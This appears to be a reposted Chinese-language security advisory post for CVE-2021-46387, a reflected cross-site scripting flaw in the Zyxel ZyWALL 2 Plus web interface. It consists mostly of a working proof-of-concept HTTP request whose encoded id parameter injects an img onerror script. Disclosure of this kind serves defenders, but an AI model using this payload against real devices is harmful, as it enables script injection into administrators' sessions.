首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >Zyxel ZyWALL 2 Plus 互联网安全设备 - 跨站点脚本 (XSS)

Zyxel ZyWALL 2 Plus 互联网安全设备 - 跨站点脚本 (XSS)

作者头像
Khan安全团队
发布2022-03-09 16:15:58
发布2022-03-09 16:15:58
2880
举报
文章被收录于专栏:Khan安全团队Khan安全团队

版本:ZyWALL 2 Plus

测试平台:Ubuntu Linux [Firefox]

CVE:CVE-2021-46387

代码语言:javascript
复制
GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档